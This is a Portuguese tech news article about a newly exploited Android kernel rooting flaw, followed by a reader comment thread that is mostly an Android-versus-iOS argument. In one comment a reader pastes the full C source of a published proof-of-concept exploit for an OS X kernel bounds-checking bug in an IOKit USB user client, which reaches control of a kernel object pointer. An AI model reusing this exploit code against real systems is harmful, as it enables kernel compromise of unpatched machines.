Android

Cuidado, há uma nova falha grave no Android!

68 Comentários

O rooting explora as fragilidades que são descobertas no Android ao desbloquear os sistemas e dar aos utilizadores acesso pleno, sem os normais controlos. Por norma isto é feito de forma consciente e controlada, sendo realizado pelos utilizadores.

Mas a Google veio agora alertar para uma nova falha que foi descoberta e que permite a uma simples aplicação alterar o Android de forma permanente, nem sempre com as melhores intenções.

Android Nexus

Esta falha do Android foi descoberta pela C0RE Team e pela Zimperium, a mesma que antes já tinha trazido ao mundo o Stagefright.

É um problema que começou por afectar o mundo Linux e que a Google entendeu que não afectava o seu sistema operativo. Mas a verdade é que este problema pode mesmo ser explorado no Android e na verdade está já a ser.

Este bug tem está presente no Kernel do Android, que é partilhado com o Linux e permite que possam ser contornadas as regras de segurança do Android, de forma permanente e expor o smartphone.

Android

A reacção da Google

A Google está a tomar este problema de forma muito séria. Para além do alerta de segurança emitido, a empresa está já a trabalhar de perto com a comunidade que desenvolve o AOSP para que o problema seja sanado.

Além disto a Google prepara-se para lançar nos próximos dias uma actualização de segurança. Os parceiros OEM receberam também este patch de segurança para que os enviem para os seus equipamentos.

O maior problema é que a falha está já a ser explorada e existem já várias aplicações detectadas que a estão a usar. Neste caso limitam-se a fazer root aos Nexus 5 e 6, mas em breve poderá ser usada para outros fins, sem que os utilizadores tenham noção disso, comprometendo de imediato os terminais.

Android

Que medidas estão a ser tomadas para proteger o Android?

A Google já retirou da Play Store esta aplicação, mas a mesma pode ser obtida facilmente noutras lojas de aplicações. Mesmo recorrendo à sua política de proibição de aplicações na Play Store, que permitam fazer Root e também à verificação activa de aplicações maliciosas, dificilmente a Google irá conseguir controlar este problema.

A solução deverá chegar dentro de dias nas actualizações de segurança mensais que a Google lança para os seus equipamentos Nexus e os restantes fabricantes devem seguir o mesmo caminho.

Mesmo assim, e graças à fragmentação do Android, muitos vão ser os equipamentos que não vão ter acesso a estas actualizações e que vão continuar expostos ao problema.

PUB
Autor: Pedro Simões
Partilhar:
Tags:
Android App cópias de segurança falha play store Root Segurança

PUB.

Questão Semanal

Deveria haver uma marca obrigatória em todas as imagens geradas por IA?

Ver Resultados

Loading ... Loading …
Arquivo de Questões

PUB.

Velocímetro Pplware

Teste a velocidade da sua Internet
O Facebook desistiu de suportar os BlackBerry
Artigo anterior

O Facebook desistiu de suportar os BlackBerry
Programação Web – #6: Classes
Próximo artigo

Programação Web – #6: Classes
PUB

Comentários

68

Deixe um comentário

O seu endereço de email não será publicado. Campos obrigatórios marcados com *

  1. Avatar de Miguel
    Miguel

    Bootloader locked e não tenho que me preocupar com essas coisas.

    O pessoal faz root e unlock bootloader depois metem-se a jeito!

    Responder
    1. Avatar de Miguel
      Miguel

      Exato. Enquanto isso no meu Windows 10 Mobile nem sequer um anti-virus preciso.
      Hehehehe 😀

      Responder
      1. Avatar de Alfa
        Alfa

        +1

        Responder
        1. Avatar de jokam
          jokam

          +1

          Responder
      2. Avatar de Nuno
        Nuno

        Tal como o Windows RT não precisava, aliás, nem o Android!
        Mal começar a ter bastantes utilizadores verás…

        Responder
    2. Avatar de Nexus4
      Nexus4

      lol, entao e quer quer apenas ter o bootloard unlock para usar custom roms, tem de ser crucificado?
      percebo o que queres dizer, mas o teu comentário não faz sentido.

      Responder
    3. Avatar de Toderici
      Toderici

      Sim e assim ficas la com outras apps de treta que nunca utilizas e nem podes desinstalar…

      Responder
    4. Avatar de Tomás
      Tomás

      a não ser que o teu bootloader se refira a outra coisa qualquer, o Bootloader num Android não tem nada a ver com acesso root ao sistema operativo, por isso Bootloader locked não serve de nada para não ficares preocupado com estas coisas.

      Responder
      1. Avatar de Miguel
        Miguel

        Tenta fazer root então num xiaomi com o bootloader locked e vais ter uma supresa!

        Responder
        1. Avatar de Tomás
          Tomás

          o bootloader apenas te escolhe e arranca o sistema, não afecta como o sistema corre e as permissões de acesso dentro do sistema. Se isso te acontece não é por ter o bootloader em si bloqueado, mas por o processo usado para o unlock do bootloader ter desactivado primeiro uma outra medida de segurança que depois usaste para o root. Isto é ter o bootloder bloqueado em nada te garante que não haja outra via para acesso ao root.

          Responder
    5. Avatar de João Raposo
      João Raposo

      Isso de bootloaders e etc é chinês para 99% das pessoas. Mas o Android é “melhor”

      Responder
  2. Avatar de jesus
    jesus

    Qual o nome da aplicação retirada da loja pela Google?

    Responder
    1. Avatar de Vítor M.
      Vítor M.

      A Google não refere.

      Responder
    2. Avatar de Hoggar
      Hoggar

      Pesquisa no Google

      Responder
  3. Avatar de António Marques
    António Marques

    Pq falam de coisas q ñ sabem ? Todos os Android q tive, tive sempre com ROOT e Bootloader Unlocked…problemas ?!?!? ZERO ! Existe um site / forum chamado XDA, site esse q tem pessoas q ajudam a “libertar” o sistema Android e para ajudar todos aqueles q tenham dúvidas ! Basta ler e estudar os tópicos referentes aos modelos q têm.
    Para mim o melhor site / forum sobre Android.

    Responder
    1. Avatar de Tomás
      Tomás

      o problema está nisto ser uma vulnerabilidade que pode ser aproveitada por qualquer aplicação para ter acesso Root, sem saberes.

      Responder
  4. Avatar de Gustavo Santos
    Gustavo Santos

    Dava jeito saber qual é o nome da aplicação…

    Responder
  5. Avatar de António
    António

    A falha é nova, ou foi descoberta agora?

    Responder
  6. Avatar de andre l
    andre l

    lol o “android do chines”? por exemplo? “Mesmo assim, e graças à fragmentação do Android, muitos vão ser os equipamentos que não vão ter acesso a estas actualizações e que vão continuar expostos ao problema.”

    Responder
  7. Avatar de Jacinto Leite Capelo Rego
    Jacinto Leite Capelo Rego

    O Android é mais falhas! Essa é que é a verdade…

    Responder
  8. Avatar de José Antonio Maria
    José Antonio Maria

    “Por norma isto é feito de forma consciente e controlada, sendo realizado pelos utilizadores.” Oi?
    Desde quando? Os utilizadores dizem amén a tudo. A app da flashlight acede aos contactos e dizem que sim. Algo feito de forma consciente e controlada? isso existe? onde raio foram buscar esta opinião?

    Responder
    1. Avatar de NMF
      NMF

      desde que é preciso saber o que se está a fazer para fazer root a um telemóvel

      Responder
      1. Avatar de MaRIA
        MaRIA

        Vou já tirar um curso para prender a fazer root ao telemóvel.
        😉

        Responder
        1. Avatar de Gustavo Parreira
          Gustavo Parreira

          Acredita que muita gente precisa… Não é assim tão fácil para quem é mais “iletrado” em tecnologia

          Responder
        2. Avatar de K
          K

          Na verdade até precisas e não é fácil. A única razão pela qual não o fizeste é porque há gente que o fez por ti, teve o trabalho e teve a gentileza de o publicar de forma extremamente simplificada para asnos como nós o conseguirmos reproduzir sem ter que perceber muito do assunto. Ou achas que as coisas caem do céu?

          Não fazes root ao teu telemóvel por acidente, e quando eles se referem a uma forma consciente e controlada é quando o fazes para obter um fim específico. Quando é explorado maliciosamente é quando deixou de ser consciente e controlado.
          Agora ao que tu provavelmente te queres referir é às consequências de o fazer. Se vais por aí, é responsabilidade tua saberes ao que estás sujeito e o que pode advir disso, positivo e negativo.

          Responder
    2. Avatar de Alfa
      Alfa

      looooool mesmo

      Responder
  9. Avatar de #Fernando
    #Fernando

    Só mais uma….todos os dias sai uma nova…qual a novidade…bah

    Responder
  10. Avatar de Rui
    Rui

    mais uma…. android nunca mais, so me deu problemas.

    Responder
    1. Avatar de cenas
      cenas

      Qual o SO que usas? Diz-me um que não tenha problemas que eu mudo ja 🙂

      Responder
      1. Avatar de Tony
        Tony

        zx spectrum

        Responder
    2. Avatar de Pedro
      Pedro

      Que problemas? Foste hackado foi? É que aparentemente este tipo de coisas só afectam quem é burro ou quem se mete a fazer o que não deve.

      Responder
      1. Avatar de Hugo
        Hugo

        Chamados problemas de utilizador lol
        Eu nunca tive problemas “maiores” com o android.

        Responder
  11. Avatar de cenas
    cenas

    Nao se te referes a iOS, mas se sim aqui vai uma lista de problemas, referencias no pplware 😉
    1) https://pplware.sitedev.pt/informacao/falha-de-seguranca-https-afecta-milhoes-de-utilizadores-ios/
    2) https://pplware.sitedev.pt/informacao/apps-ios-que-usam-browser-tem-grave-problema-de-seguranca/
    3) https://pplware.sitedev.pt/apple/apple-ainda-nao-actualizou-falha-de-seguranca-do-gatekeeper/
    4) https://pplware.sitedev.pt/smartphones-tablets/ios/iphone-tem-uma-falha-que-permite-instalacao-de-apps-maliciosas/
    5) https://pplware.sitedev.pt/software/mac-os-e-ios-considerados-os-sistemas-mais-inseguros-em-2015/
    6) …. a lista podia continuar 🙂

    So para dizer que: problemas todos os SO tem. Uns mais que outros.

    Responder
    1. Avatar de Tony
      Tony

      +1

      Responder
    2. Avatar de Hugo
      Hugo

      E digo mais,
      Quanto mais seguro for o SO, mais vulnerável é o utilizador 🙂

      Responder
      1. Avatar de RVM
        RVM

        Frases feitas que tiraste do rabo.

        Responder
        1. Avatar de Hugo
          Hugo

          Se é mentira estás à vontade para argumentar.

          E sim, sempre rabo, quando se tratam de progenitoras de frequentadores do pplware não corro riscos 🙂 boa Páscoa pra ti tmb, e dá-te um pouco mais ao respeito que não te fica nada mal.

          Responder
    3. Avatar de Mota
      Mota

      +1

      Responder
    4. Avatar de RVM
      RVM

      Mas isso é só no pplaware, porque na realidade, o Android é um poço de malware, já no iOS, na prática, nada!

      Responder
      1. Avatar de Hugo
        Hugo

        Na tua realidade talvez.
        Contra argumentos desses nem vale a pena dar bola.
        Tens uma maça no sitio do coração e basta 😛

        Responder
    5. Avatar de Francisco Pinto
      Francisco Pinto

      A diferença é que 90% ou mais dessas falhas que apontas já foram corrigidas e a esmagador maioria dos idevices têm acesso essas correções . no android a correção as falhas que vão aparecendo só ficam disponível para “meia dúzia” de dispositivos! é essa a grande diferença! Enquanto no IOS as falhas vão sendo corrigidas e disponibilizadas a quase todos mal estejam disponíveis no android rezem que os vossa dispositivos tenham acesso as correções! Abraço

      Responder
      1. Avatar de zé barbas
        zé barbas

        se a correcção for lançada pela google qualquer aparelho pode ter acesso! a apple tb não actualiza todos os idevices, kem tem os mais antigos fica a chuchar no dedo!

        Responder
        1. Avatar de Tomás
          Tomás

          A correcção está disponível para aparelhos a partir de 2011, cerca de 97% de todos os aparelhos ainda em uso com iOS. Qual será a percentagem de Nexus em uso que podem ter correcção?

          Responder
  12. Avatar de AnaguaMateus
    AnaguaMateus

    Não há SO sem problemas, há SO que não foram explorados o suficiente.

    Antigamente o Windows era um cancro, agora o Android, baseado em linux é uma besta..

    Só a Apple é que é boa… cof cof.. Se fosse o SO mais usado, era logo encontrado uns quantos..

    Responder
    1. Avatar de Hugo
      Hugo

      Exactamente.
      E vamos lá fazer a analogia dos automoveis:
      Porque não andamos todos de mercedes? É bom…venha quem vier.
      Essa coisa do ser melhor só é usado pra não ficarem com penas dos € investidos em telefones.
      Pk quem realmente quer e pode ter um topo de gama compra e nem tem qu justificar nada 🙂

      Responder
  13. Avatar de Alfa
    Alfa

    WP, e mais nada.

    Responder
  14. Avatar de Jorge
    Jorge

    Boas noticias mas só deveremos receber a atualizacao daqui a 1 ano
    Ainda a espera do marshmellow para o galaxy s6 🙁

    Responder
    1. Avatar de Mota
      Mota

      Oh Jorge, o autor do artigo foi claro nesse aspeto:

      “Os parceiros OEM receberam também este patch de segurança para que os enviem para os seus equipamentos.”

      Resta-te aqui 2 coisas:

      Ou compras nexus e tens updates durante anos
      ou compras um equipamento que te permita alterar rom, para quando a tua “marca” deixe de lançar updates.

      Responder
    2. Avatar de Edgar
      Edgar

      Recebi o marshmallow hoje no meu S6 Edge + 🙂

      Responder
    3. Avatar de samuel
      samuel

      Mas deve ter atualizações de segurança mensais.

      Responder
  15. Avatar de Francisco
    Francisco

    Apenas uma das “leis” de segurança informática: mais vale ter um sistema que quando se encontra uma falha, todos sabem e podem se proteger, que um sistema fechado que também tem falhas, mas só o cracker sabe.

    Responder
    1. Avatar de Tomás
      Tomás

      informação de falhas não tem nada a ver com ser ou não Open Source, tem a ver com a pessoa que a descobre comunicar.

      Responder
  16. Avatar de Diogo
    Diogo

    uma parte do android é open source, outra parte tem codigo da google. o facto de uma parte ser open source favorece que sejam descobertas mais falhas e vulnerabilidades tornando o sistema mais seguro. testes recentes mostram que o android é mais seguro que ios.

    Responder
    1. Avatar de Tomás
      Tomás

      Esta falha no kernel Linux já foi descoberta há mais de 2 anos e só agora é que no Android decidiram corrigir. Não parece que tenha favorecido muito.
      Que testes recentes são esses?

      Responder
    2. Avatar de Mota
      Mota

      Poderá ser mais seguro, mas aqui lá está.. depende sempre do utilizador.

      Eu tendo mais liberdade num S.O. controlo melhor a minha segurança, lógico que nada é anti bala, mas é possivel ter-se segurança

      Responder
  17. Avatar de rui
    rui

    O problema disto é que vai ser mais uma vez que só as versões de android de 5 para cima é que vão receber as tais atualizações a corrigir isto. Quem tem para baixo fica na mesma.

    Responder
  18. Avatar de O confundido
    O confundido

    Falhas? Alguém que me traduza isso porque eu com o meu W10M nao percebo grande coisas de falhas

    Responder
    1. Avatar de samuel
      samuel

      Não cantes muito de galo, que se ainda não tem falhas, é apenas uma questão de tempo até ter. É assim com todos os SOs

      Responder
      1. Avatar de O confundido
        O confundido

        Para já ainda tou a procura deles, agora no caso dos androids… Tens android? Quantas vezes ja reiniciaste hj? 2? 3? Pois…

        Responder
        1. Avatar de Hugo
          Hugo

          Reiniciar pk? É hábito?

          Responder
    2. Avatar de zé barbas
      zé barbas

      pois, com a quantidade de coisas e apps que existem pra esse tijolo a que chamas de telemóvel, realmente é difícil haver falhas!

      Responder
  19. Avatar de jorge santos
    jorge santos

    O meu Nexus 6P parece-me ter sido uma boa compra.

    Responder
  20. Avatar de David Ramos
    David Ramos

    Só vejo um motivo para os utilizadores de IOS virem, todos chateados, comentar esta notícia que até foi notificada pela própria Google. O motivo é estarem entalados com um equipamento que não vale o preço. Não vejo outra razão. É que nem sequer são coerentes nem realistas nas críticas. E o pior é que não pesquisam antes de comentar seja o que for. Em relação a notícia tenho um equipamento da Apple e outro da Google (nexus) e até acho (parece-me a mim) que os equipamentos nexus recebem as correcções mais rapidamente do que o IOS (no meu caso um ipad)

    Responder
  21. Avatar de skylle
    skylle

    Precisa PoC
    Informação inútil !!

    Responder
  22. Avatar de skylle
    skylle

    olha uma vulnerabilidae em iOS

    /*
    Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=728

    External Method 36 of IOUSBInterfaceUserClient is _AbortStreamPipe.

    It takes two scalar inputs and uses the second one as an array index to read a pointer
    to a C++ object without checking the bounds then calls a virtual method on it.

    Furthermore there’s no check that the array pointer is non-null; if it is then we can get a
    controlled offset-from-zero read; since our controlled dword will be multiplied by 8 to
    index the array this means we can easily get the kernel to dereference a controllable
    userspace address.

    In this case a value of 0xf0f0f0f0 leads to the kernel reading an IOKit object pointer from
    0x787878780. This poc maps that page to demonstrate control of a kernel object pointer.

    tested on MacBookAir5,2 w/10.11.3 (15D21)
    */

    // ianbeer

    // build: clang -o usb_oob usb_oob.c -framework IOKit
    // tested on MacBookAir5,2 w/10.11.3 (15D21)

    /*
    OS X Kernel code execution due to lack of bounds checking in AppleUSBPipe::Abort

    External Method 36 of IOUSBInterfaceUserClient is _AbortStreamPipe.

    It takes two scalar inputs and uses the second one as an array index to read a pointer
    to a C++ object without checking the bounds then calls a virtual method on it.

    Furthermore there’s no check that the array pointer is non-null; if it is then we can get a
    controlled offset-from-zero read; since our controlled dword will be multiplied by 8 to
    index the array this means we can easily get the kernel to dereference a controllable
    userspace address.

    In this case a value of 0xf0f0f0f0 leads to the kernel reading an IOKit object pointer from
    0x787878780. This poc maps that page to demonstrate control of a kernel object pointer.
    */

    #include
    #include
    #include
    #include
    #include

    #include
    #include

    #include

    void map_payload(uint64_t target_rip) {
    uint64_t*** obj_ptr_ptr = (void*)0x0000000787878780;
    void* request = (void*)0x0000000787878000;
    void* page = mmap(request, 0x1000, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANON|MAP_PRIVATE, -1, 0);
    if (request != page) {
    printf(“MAP_FIXED didn’t give us the right page\n”);
    exit(EXIT_FAILURE);
    }

    memset((void*)page, ‘A’, 0x1000);
    }

    uint64_t make_call(mach_port_t conn) {
    kern_return_t err;

    uint64_t inputScalar[16];
    uint64_t inputScalarCnt = 0;

    char inputStruct[4096];
    size_t inputStructCnt = 0;

    uint64_t outputScalar[16];
    uint32_t outputScalarCnt = 0;

    char outputStruct[4096];
    size_t outputStructCnt = 0;

    inputScalarCnt = 2;
    inputScalar[0] = 0;
    inputScalar[1] = 0xf0f0f0f0;

    err = IOConnectCallMethod(
    conn,
    36,
    inputScalar,
    inputScalarCnt,
    inputStruct,
    inputStructCnt,
    outputScalar,
    &outputScalarCnt,
    outputStruct,
    &outputStructCnt);

    if (err != KERN_SUCCESS){
    printf(“IOConnectCall error: %x\n”, err);
    } else{
    printf(“worked?\n”);
    }

    return 0;
    }

    mach_port_t get_user_client(char* name, int type) {
    kern_return_t err;

    CFMutableDictionaryRef matching = IOServiceMatching(name);
    if(!matching){
    printf(“unable to create service matching dictionary\n”);
    return 0;
    }

    io_iterator_t iterator;
    err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
    if (err != KERN_SUCCESS){
    printf(“no matches\n”);
    return 0;
    }

    io_service_t service = IOIteratorNext(iterator);

    if (service == IO_OBJECT_NULL){
    printf(“unable to find service\n”);
    return 0;
    }
    printf(“got service: %x\n”, service);

    io_connect_t conn = MACH_PORT_NULL;
    err = IOServiceOpen(service, mach_task_self(), type, &conn);
    if (err != KERN_SUCCESS){
    printf(“unable to get user client connection\n”);
    return 0;
    }

    printf(“got userclient connection: %x\n”, conn);

    return conn;
    }

    int main(int argc, char** argv){
    mach_port_t port = get_user_client(“IOUSBInterface”, 0x0);
    map_payload(0xffff414141414141);
    make_call(port);
    return 0;

    }

    Responder
    1. Avatar de Tomás
      Tomás

      é uma vulnerabilidade no OS X e que foi corrigida.

      Responder
  23. Avatar de zeze
    zeze

    Bastava a google bloquear a instalação de apks externos via file explorers e afins.

    Os utilizadores ficavam mais limitados como os do iOS e os devs eram os únicos com conhecimentos suficientes pra proceder à instalação das suas apps pra testes e debugging.

    Responder
  24. Avatar de skylle
    skylle

    “Se um hacker tiver acesso fisico ao teu dispositivo,
    ele deixa de ser teu!”
    –Mitnick
    Agora so precisas saber quem é o hacker, eu sei que eu o sou nos meus dispositivos.

    Responder
Aviso:

Todo e qualquer texto publicado na internet através deste sistema não reflete, necessariamente, a opinião deste site ou do(s) seu(s) autor(es). Os comentários publicados através deste sistema são de exclusiva e integral responsabilidade e autoria dos leitores que dele fizerem uso. A administração deste site reserva-se, desde já, no direito de excluir comentários e textos que julgar ofensivos, difamatórios, caluniosos, preconceituosos ou de alguma forma prejudiciais a terceiros. Textos de caráter promocional ou inseridos no sistema sem a devida identificação do seu autor (nome completo e endereço válido de email) também poderão ser excluídos.